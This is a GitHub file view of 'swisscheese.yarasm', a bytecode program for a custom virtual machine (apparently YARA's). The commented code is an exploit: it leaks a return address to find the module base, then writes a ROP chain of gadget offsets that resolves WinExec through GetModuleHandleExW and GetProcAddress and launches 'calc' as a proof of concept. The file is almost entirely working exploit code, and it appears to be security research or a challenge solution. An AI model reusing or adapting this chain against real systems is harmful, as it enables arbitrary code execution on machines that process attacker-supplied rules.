-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathswisscheese.yarasm
142 lines (106 loc) · 3.06 KB
/
swisscheese.yarasm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
; I have 18 DWORDS on the stack. then a pointer i mustt touch, then whatever i want
; so 9 QWORDS
OP_PUSH_M raw 0x11
OP_PUSH raw 0xFFFFFFFF
OP_BITWISE_AND
; stack: [orig retaddr]
OP_PUSH raw 0x38F2 ; offset of orig retaddr from base
OP_INT_SUB
OP_POP_M raw 0 ; save base address to Mem
; mem: [baseaddr], stack:[]
; --------------------------------------------------------------------
; end of init
; --------------------------------------------------------------------
; write QWORD 1
; add base to gadget offset
OP_PUSH_M raw 0
OP_PUSH raw 0x51108 ; :call GetModuleHandleExW
OP_INT_ADD
OP_PUSH raw 2 ; GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x11
; write QWORD 2
OP_PUSH wide "kernel32"
OP_PUSH reloc 0 ; some random address here
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x12
; write QWORD 3
OP_PUSH reloc 0 ; will be put in ecx, used later to not crash
OP_PUSH_M raw 0
OP_PUSH raw 0x5E29
OP_INT_ADD
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x13
; write QWORD 4
OP_PUSH raw 0 ; junk in ebp
OP_PUSH_M raw 0
OP_PUSH raw 0x2a1ec ; offset to mov eax, [eax]; ret
OP_INT_ADD
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x14 ; will put 0 in ebp
; write QWORD 5
OP_PUSH_M raw 0 ; BASE
OP_PUSH raw 0x368ca ; offset to mov edx,eax;...; mov [ecx],edx; ret - ecx must be a valid pointer
OP_INT_ADD
OP_PUSH_M raw 0
OP_PUSH raw 0x1a61 ; offset to pop ecx, ret
OP_INT_ADD
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x15
; cant touch EDX
; write QWORD 6:
OP_PUSH_M raw 0
OP_PUSH raw 0xc9064 ; subtracted 44 hex to account for later gadget offset to getprogaddress address
OP_INT_ADD
OP_PUSH_M raw 0
OP_PUSH raw 0x37995
OP_INT_ADD
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x16
; write QWORD 7 - GetProcAddress + target proc
OP_PUSH_M raw 0
OP_PUSH raw 0x4ca6d ; mov esp+4, edx ; (hmodule), jmp eax
OP_INT_ADD
OP_PUSH_M raw 0
OP_PUSH raw 0x51115 ; :ret ; instead of: raw 0x101eb ; pop ebx, pop ebp; ret
OP_INT_ADD
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x17
; write QWORD 8
; second arg for WinExec + ret address
OP_PUSH raw 0 ; leave room for handle
OP_PUSH ascii "WinExec"
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x18
OP_PUSH_M raw 0
OP_PUSH raw 0x101e4 ; call eax;
OP_INT_ADD
OP_PUSH ascii "calc"
OP_PUSH raw 32
OP_SHL
OP_BITWISE_OR
OP_POP_M raw 0x19
; --------------------------------------------------------------------
; end of rop
; --------------------------------------------------------------------
OP_NOP
OP_HALT
; --------------------------------------------------------------------
; end of code
; --------------------------------------------------------------------